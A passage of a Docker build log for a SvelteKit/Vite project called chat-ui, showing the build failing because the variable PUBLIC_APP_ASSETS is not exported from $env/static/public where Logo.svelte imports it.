0.0s\r\n => CACHED [stage-2 4/5] COPY --link --chown=1000 package.json /app/packa 0.0s\r\n => ERROR [builder 3/3] RUN --mount=type=secret,id=DOTENV_LOCAL,dst=.env. 3.7s\r\n------ \r\n > [builder 3/3] RUN --mount=type=secret,id=DOTENV_LOCAL,dst=.env.local npm run build: \r\n#0 0.622 \r\n#0 0.622 > chat-ui@0.3.0 build\r\n#0 0.622 > vite build\r\n#0 0.622 \r\n#0 0.831 \u25b2 [WARNING] Cannot find base config file \"./.svelte-kit/tsconfig.json\" [tsconfig.json]\r\n#0 0.831 \r\n#0 0.831 tsconfig.json:2:12:\r\n#0 0.831 2 \u2502 \"extends\": \"./.svelte-kit/tsconfig.json\",\r\n#0 0.831 \u2575 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n#0 0.831 \r\n#0 1.551 \r\n#0 1.551 vite v4.3.9 building SSR bundle for production...\r\n#0 1.583 transforming...\r\n#0 3.551 \u2713 165 modules transformed.\r\n#0 3.551 \u2713 built in 2.00s\r\n#0 3.551 \"PUBLIC_APP_ASSETS\" is not exported by \"$env/static/public\", imported by \"src/lib/components/icons/Logo.svelte\".\r\n#0 3.551 file: /app/src/lib/components/icons/Logo.svelte:3:10\r\n#0 3.551 1: